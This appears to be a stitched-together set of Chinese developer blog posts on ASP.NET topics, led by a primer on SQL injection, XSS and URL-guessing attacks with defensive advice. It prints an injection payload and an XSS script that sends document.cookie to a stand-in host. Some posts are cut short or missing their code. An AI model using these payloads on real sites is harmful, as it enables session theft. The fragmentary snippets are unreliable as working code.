互联网项目里边，SQL 注入漏洞、XSS 漏洞和猜测 URL 攻击这三个漏洞可谓历史悠久，然而直到今天还有人不断中枪，也真是微醺。

这几个漏洞说大也大，说小也小。说大是说这些漏洞危害大，会导致数据层面的安全问题；说小是从技术层面上讲都是未对外部输入做处理导致的，想要做针对性地防范很简单。下面简单看看这些漏洞的原因及防范方法。

SQL 注入

SQL 注入之所以存在，主要是因为工程师将外部的输入直接嵌入到将要执行的 SQL 语句中了。黑客可以利用这一点执行 SQL 指令来达到自己目的。举例来说，有一个接受参数为 id 的页面，在接收到id后从数据库中查询相应的数据， 其代码大致如下：

string  SQL = "SELECT * FROM [User] WHERE ID=" + Request["ID"];

正常情况下，Request["ID"] 为数字，这条 SQL 能很好地工作。如果我们认为修改 Request["ID"]，将其内容修改为 ID=1 OR 1=1 我们将得到这样一条 SQL：

SELECT * FROM [User] WHERE ID=1 OR 1=1

因为有 OR 的出现这条 SQL 语句已经可以获取 User 表中的任意信息。利用 SQL 注入漏洞，我们能够获取想要的信息，同时可以通过猜测-报错获取到数据库其它表的结构和信息，如果数据库、服务器权限设置不当，甚至有可能能获取到整个服务器的控制权限。

规避这种漏洞有很多种办法，以现代的编程语言来说，选择一个合适的 ORM 框架可以减少不少问题而且能大大提高开发效率。

如果因为某些原因需要继续写 SQL 语句，参数化查询也能解决这一问题。

对于需要拼接 SQL 语句的程序来说，注意两点也可以避免此问题。第一点是如果查询的字段类型是数字等类型，在拼接 SQL 前先判断输入是不是一个合法的数字，不合法则终止程序即可。第二点是如果字段类型是字符串，则记得将输入里的单引号进行转义。

XSS 攻击

如果说 SQL 注入是直接在 SQL 里执行了用户输入，那 XSS 攻击是在 HTML 里代码执行了用户输入。相对 SQL 注入，XSS 似乎更能引起人关注。几年前新浪微博被人利用 XSS 获取大量粉丝；3DM 也曾经被植入 script 代码对另一个游戏网站进行了惨无人道的 DDOS 攻击。

这里还是用 SQL 注入中的例子来说，假设页面输出为：

<div><%= Request["ID"] %></div>

这里我们可以在 Request["ID"] 里传入一段编码后的脚本，在最终输出的时候，就变成了一段可执行的 javascript 代码。

<script>window.location.href='anothersite.com?cookie=' + document.cookie;</script>

这段代码获取到当前页面的 cookie 值，并将 cookie 值传递到另一个名为 anothersite.com 的网站。利用这种模式，黑客可以获取到用户的登录信息或者将用户跳转到钓鱼网站来达成自己的目的。

XSS 攻击也可以简单分为两种，一种是上述例子中利用 url 引诱客户点击来实现；另一种是通过存储到数据库，在其它用户获取相关信息时来执行脚本。

防范 XSS 攻击需要在所有的字段都对输入的字符串进行 html encode（或者在输出时进行 encode）。如果需要使用富文本编辑的，可以考虑使用 UBB。

猜测 URL 攻击

猜测 URL 攻击是通过已知的 GET、POST 参数来猜测未公开的参数并尝试进行攻击。

以 Request["ID"] 为例，如果 ID 为 1 是合法的可访问的数据，可以通过尝试 ID=2，ID=3 等一系列来尝试是否对其它资源有访问、修改权限。如果控制不当，则可以轻松获得并修改数据。

要避免这种问题，方案一是使用较长的无规律的数字、字符来做为 ID，增大猜测难度；对于需要登录的程序，可以判断用户身份是否有对应 ID 数据的访问、修改权限；如果 ID 已经是自增类型且不需要登录，可以用过在 URL 里增加无规律的校验字段来避免。

其它需要注意的地方

安全是一个系统工程。

要提高系统安全性，最首要的一点是不要相信任何输入！不要相信任何输入！不要相信任何输入！重要的事情说三遍。这里的输入除了 URL 里的 GET 参数、POST 参数，还包括 COOKIE、Header 等可以进行修改的各类信息。

在程序设置方面，不输出客户不需要知道的各类信息，如原始的异常信息、异常附近的代码段等等，这样也能增加不少安全性。

最后，在测试或系统运行的过程中，可以使用类似 appscan 这样的安全检测工具来检查程序是否有漏洞。

　　windows 7和vista提高的系统的安全性，同时需要明确指定“以管理员身份运行”才可赋予被运行软件比较高级的权限，比如访问注册表等。否则，当以普通身份运行的程序需要访问较高级的系统资源时，将会抛出异常。

　　如何让程序在启动时，自动要求“管理员”权限了，我们只需要修改app.manifest文件中的配置项即可。

　　app.manifest文件默认是不存在的，我们可以通过以下操作来自动添加该文件。

（1）进入项目属性页。

（2）选择“安全性”栏目。

（3）将“启用ClickOnce安全设置”勾选上。

　　现在，在Properties目录下就自动生成了app.manifest文件，打开该文件，将trustInfo/security/requestedPrivileges节点的requestedExecutionLevel的level的值修改为requireAdministrator即可。如下所示：

      <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
         <requestedExecutionLevel level="requireAdministrator" uiAccess="false" />
      </requestedPrivileges>

　　记住，如果不需要ClickOnce，可以回到项目属性页将“启用ClickOnce安全设置”不勾选。 　　

　　接下来，重新编译你的程序就OK了。

异常加载 ssp.ggfeng.com，使页面样式冲突，堪比后门 —— 2016-11-18

最近做到微信语音时用到，将微信的媒体文件（.amr）下载到自己服务器上，并转码为 .mp3 格式。

引用“NAudio.dll”或直接搜索 NuGet 包，将音频文件转码为 .mp3 只需要：

var data = new MediaFoundationReader("..\\amr\\test.amr");
MediaFoundationEncoder.EncodeToMP3(data, "..\\test.mp3", 码率默认192000);

若出现异常：

无法加载 DLL“mfplat.dll”: 找不到指定的模块。

原因是没有安装音频解码组件，以 Windows Server 2012 R2 为例：

打开“服务器管理器”，添加角色和功能，勾选“桌面体验”（可能在“用户界面和基础结构”，默认还会勾上“墨迹和手写服务”）

安装完成需要重启计算机。

若出现异常：

不支持给定的 URL 的字节流类型。 (异常来自 HRESULT:0xC00D36C4)

原因可能是没有能够播放 .amr 的解码器，或音频驱动！

如果还是搞不定，本站搜索 ffmpeg 吧！

打开 SSMS

选择数据库，右键，属性

选择“权限”，点击“查看服务器权限”

选择“数据库设置”，修改“备份”框路径

注意：更改一个数据库的备份路径后，对所有数据库都是有效的

现在如果备份数据库到新的目录，会报以下错误：

无法打开备份设备。出现操作系统错误 5(拒绝访问。)。BACKUP DATEBASE 正在异常终止。。

那就在新的备份目录上右键属性，安全，编辑，添加，在框内填写“NT SERVICE\MSSQLSERVER”这个服务用户，确定，（这个用户名称会自动变成“MSSQLSERVER”，如果没有这个用户，点击“高级”-“立即查找”，选择 MSSQLSERVER 或 NT SERVICE\MSSQL$InstanceName），然后选择“完全控制”，一路确定

现在可以备份到新的目录中去啦

“/”应用程序中的服务器错误。

---

未能加载文件或程序集“XXXXXX”或它的某一个依赖项。试图加载格式不正确的程序。

说明: 执行当前 Web 请求期间，出现未经处理的异常。请检查堆栈跟踪信息，以了解有关该错误以及代码中导致错误的出处的详细信息。 

异常详细信息: System.BadImageFormatException: 未能加载文件或程序集“XXXXXX”或它的某一个依赖项。试图加载格式不正确的程序。

源错误: 
 

执行当前 Web 请求期间生成了未经处理的异常。可以使用下面的异常堆栈跟踪信息确定有关异常原因和发生位置的信息。

程序集加载跟踪: 下列信息有助于确定程序集“XXXXXX”未能加载的原因。
 

警告: 程序集绑定日志记录被关闭。 要启用程序集绑定失败日志记录，请将注册表值 [HKLM\Software\Microsoft\Fusion!EnableLog] (DWORD)设置为 1。 注意: 会有一些与程序集绑定失败日志记录关联的性能损失。 要关闭此功能，请移除注册表值 [HKLM\Software\Microsoft\Fusion!EnableLog]。

当使用 Visual Studio 发布网站时，可能会遇到上述黄屏报错，原因之一是引用的 dll 路径不正确，可以用 Release 模式生成一次看看；原因之二是应用程序的位数与服务器的不匹配。

一般来说用“Any CPU”的方式没有问题，但遇到上述报错的百度网友都很轻松地通过修改 IIS 应用程序池的“启用 32 位应用程序”来解决这个问题，原因是他们的服务器是 64 位操作系统。当我这次在 32 位操作系统的服务器上遇到这个问题的时候真的是手足无措了，然后一阵乱配置，偶尔还能成功跑起来，于是仔细对比了发布到服务器上的文件，发现只有 bin 目录下的 dll 文件有区别，而导致这些区别的原因是我在发布时把“Release - Any CPU”换成了“Debug - Any CPU”，所以一时找不到更好的解决办法的朋友不妨也试试这个方法，只是会有一点点担心性能问题。有更好的解决方案的朋友也不要忘了联系我。

在 ASP.NET 网站开发过程中，若提交的表单中包含有 HTML 代码，为了安全，.NET 会自动阻止提交，并抛出异常：

从客户端(......)中检测到有潜在危险的 Request.Form 值。

以前的做法是

WebFrom：在 <%@ Page %> 中加入 ValidateRequest="false"

MVC：给 Action 加上属性 [ValidateInput(false)]

显然这会给网站带来极大的风险，不推荐！

以下做法可以完美解决这个问题。

客户端把内容进行 HTML 编码，如：

content = $("<div />").text(content).html();

服务端把内容进行 HTML 解码，如：

string title = HttpUtility.HtmlDecode(Request.Form["content"]);

返回序列中的第一个元素。

返回序列中的第一个元素；如果序列中不包含任何元素，则返回默认值。

返回序列的唯一元素；如果该序列并非恰好包含一个元素，则会引发异常。

返回序列中满足指定条件的唯一元素；如果这类元素不存在，则返回默认值；如果有多个元素满足该条件，此方法将引发异常。

C# 中对 Session 的“(string)”、“.ToString()”与“Convert.ToString”用法笔记
在实际操作当中，我们经常会遇到将 Session 的值转为 String 去判断是否为空或者判断是否有权限访问某页，这里的转换过程如果用得不恰当会抛出异常，给访问者带来不好的用户体验。这里我把它写成笔记，以供参考。

一、当 Session["a"] == null 时，
Session["a"].ToString() 抛出异常；
(string)Session["a"] 为 null；
Convert.ToString(Session["a"]) 为 ""。
二、当 Session["a"] == "" 时，
它们的值都为 ""。

所以，在判断 Session["a"] 是否有值时，如果用“.ToString()”，那么必需按照下面的格式与顺序写：

在这里，要注意判断的顺序：先判断是否为 null，再判断是否为 empty。如果 Session["a"] 为 null，则 Session["a"] != null 为 false 自然不会执行 .ToString()，也就不会报错；如果 Session["a"] 不为 null，则执行 .ToString() 也不会报错。
同理 if (Session["a"] == null || Session["a"].ToString() == "") 此句也合法可用。

用 .ToString() 的方法写格式比较固定，如果换成用 (string) 写，会比较自由：

这两种写法都是可行的，而且对 null 和 empty 的判断顺序没有关系。

最简单的方法就是用 Convert.ToString

不管 Session["a"] 为 null 还是 empty，Convert.ToString(Session["aaa"]) 都是 empty。